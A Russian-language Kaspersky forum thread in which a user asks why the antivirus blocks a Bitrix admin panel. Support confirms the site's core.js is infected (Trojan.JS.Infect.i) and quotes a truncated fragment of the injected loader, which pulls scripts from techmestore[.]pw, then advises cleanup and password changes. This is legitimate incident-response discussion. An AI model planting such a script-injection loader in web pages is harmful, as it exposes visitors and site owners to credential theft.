Касперский блокирует вход в админку Bitrix

[IBM01]

Добрый день! Сегодня утром столкнулся с такой проблемой.

Имеется:

Windows 10 Pro сборка 19044.1706

Google Chrome версия 102.0.5005.115

KES 11.8.0.351 базы 11.07.2022г

При попытке открыть админку на сайте написанном на Bitrix касперский блокирует подключение и загрузку кэша. В отчете пишет следующее:

Событие: Обнаружен вредоносный объект
Пользователь: Ivanov
Тип пользователя: Инициатор
Имя приложения: chrome.exe
Путь к приложению: C:\Program Files\Google\Chrome\Application
Компонент: Защита от веб-угроз
Описание результата: Обнаружено
Тип: Троянское приложение
Название: Trojan.JS.Infect.i
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Файл
Имя объекта: core.js?1656608916122338
Путь к объекту: http://www.сайт.ru/bitrix/js/main/core
SHA256 объекта: 
MD5 объекта: 
Причина: Экспертный анализ
Дата выпуска баз: Сегодня, 11.07.2022 7:16:00

___________________________________________________

Событие: Загрузка объекта запрещена
Пользователь: Ivanov
Тип пользователя: Инициатор
Имя приложения: chrome.exe
Путь к приложению: C:\Program Files\Google\Chrome\Application
Компонент: Защита от веб-угроз
Описание результата: Запрещено
Тип: Троянское приложение
Название: Trojan.JS.Infect.i
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Файл
Имя объекта: core.js?1656608916122338
Путь к объекту: http://www.сайт.ru/bitrix/js/main/core
SHA256 объекта: 
MD5 объекта: 
Дата выпуска баз: Сегодня, 11.07.2022 7:16:00

Это заражение? Или ядро сайта давно не обновляли и касперский стал считать его угрозой? 

Помогите пожалуйста разобраться с данной проблемой.

 

[IBM01]

KES 11.9.0.351*

[Danila T.]

Добрый день,

Анализируем. Как будут новости - сообщу.

[UpdateK]

Такой же Trojan.JS.Infect.i был найден в кэше браузера после заблокированного перехода на сайт.

Событие: Переход остановлен
Имя программы: chrome.exe
Путь к программе: C:\Program Files (x86)\Google\Chrome\Application
Компонент: Веб-Антивирус
Описание результата: Запрещено
Тип: Вредоносная ссылка
Название: techmestore.pw
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Веб-страница
Имя объекта: techmestore.pw
Причина: Базы
Дата выпуска баз: 09.07.2022 19:42:00

[Danila T.]

Получили ответ:

Детектирование корректно.

Trojan.JS.Infect.i

Срабатывание происходит на зараженный скрипт (вредоносный код находится в самой последней строчке s=document.createElement(`script`);s.src=atob(`aHR0), который подгружает вредоносные скрипты с домена techmestore[.]pw, который блокируется с 1 июля.

Если Вы являетесь вебмастером сайта, рекомендуется удалить данный участок кода с вашей страницы и обновить Битрикс. Настоятельно советуем Вам сменить логин/пароль для доступа к сайту, поскольку эти данные могут быть украдены злоумышленниками.

[IBM01]

1 час назад, Danila T. сказал:

Получили ответ:

Детектирование корректно.

 

Trojan.JS.Infect.i

Срабатывание происходит на зараженный скрипт (вредоносный код находится в самой последней строчке s=document.createElement(`script`);s.src=atob(`aHR0), который подгружает вредоносные скрипты с домена techmestore[.]pw, который блокируется с 1 июля.

Если Вы являетесь вебмастером сайта, рекомендуется удалить данный участок кода с вашей страницы и обновить Битрикс. Настоятельно советуем Вам сменить логин/пароль для доступа к сайту, поскольку эти данные могут быть украдены злоумышленниками.

 

Спасибо большое! 

[UpdateK]

2 часа назад, IBM01 сказал:

Спасибо большое! 

А вы сделали полную проверку ПК на вирусы? Что-нибудь было найдено?

[SirEng]

В бюллетене НКЦКИ подробности заражения веб-сайтов на Bitrix.